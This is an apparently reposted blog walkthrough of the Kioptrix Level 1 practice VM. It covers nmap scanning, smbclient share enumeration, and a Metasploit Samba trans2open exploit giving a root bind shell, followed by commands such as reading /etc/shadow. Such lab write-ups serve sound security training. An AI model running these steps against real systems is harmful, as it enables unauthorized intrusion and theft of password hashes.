Sunday, September 11, 2011

HOWTO : Kioptrix - Level 1

*** Do NOT attack any computer or network without authorization or you may put into jail. ***

Credit to : g0tmi1k

This is g0tmi1k's work but not mine. I re-post here for educational purpose only. It is because I enjoy his videos very much and I am afraid of losing them.

The original post at here

Links

Watch video on-line
Download video

Brief Overview

Kioptrix is another “Vulnerable-By-Design OS” (like De-ICE, Metasploitable and pWnOS), with the aim to go from "boot" to "root" by any means possible. This is the second video on it, first one here. Unlike last time, the entry method was via a samba weakness method which is a quick attack and straight to root.

Method

Scan network for hosts (nmap)
Scan target for running services (nmap)
Detect network shares (smbclient)
Exploit samba weakness, Trans2open (Metasploit)
Game Over

What do I need?

Kioptrix - Level 1 VM. Download here (Mirror: Part 1 MD5:4F08E9FD3C4C1A4D85D0E9E79FC3A44D, Part 2 MD58DB6CE65652880327B92150B08106EA)
VMware player OR workstation. Download here
nmap – (Can be found on BackTrack 4-R2). Download here
smbclient – (Can be found on BackTrack 4-R2). Download here
metasploit – (Can be found on BackTrack 4-R2). Download here

Walkthrough

A quick general nmap scan shows what hosts are on the network currently, before doing a more detailed scan on the target (192.168.0.111). By doing this, nmap shows what possible services (ports) the target has running and the version of the service and then attempts to identify the operating system (OS). The result of this are:

* OS: Linux v2.4.x (2.4.9-18)
* Samba: Samba smbd (wordgroup: MYGROUP)

The next stage was to test to make sure that samba was functioning correctly. By using smbclient, the attacker lists all services which are available on a target. The result being:

* Anonymous login
* Hostname (KIOPTRIX)
* Workgroup (MYGROUP)
* Defautl hidden admin shares (IPC$, ADMIN$)

The attacker proceeds begins by starting up metasploit and searching for a known exploit. After configuring all the settings required, the attacker launches it. Very soon afterwards the attacker has a remote shell, with "root" access to the system.

Commands

start-network
dhclient eth0
clear

nmap 192.168.0.* -n -sn -sP
nmap 192.168.0.111 -T4 -O -sV -sS #-sC -A -p- -v

#nmblookup -A 192.168.0.111 # Hostname
smbclient -L \\192.168.0.111 -N # What services are available on a server
clear

msfconsole
search samba
use linux/samba/trans2open
#info
show options
set RHOST 192.168.0.111
show options
exploit
#msfcli linux/samba/trans2open RHOST=192.168.0.111 PAYLOAD=generic/shell_bind_tcp E #PAYLOAD=linux/x86/shell_bind_tcp

id
uname -a
cat /etc/shadow
cat /etc/issue


That's all! See you.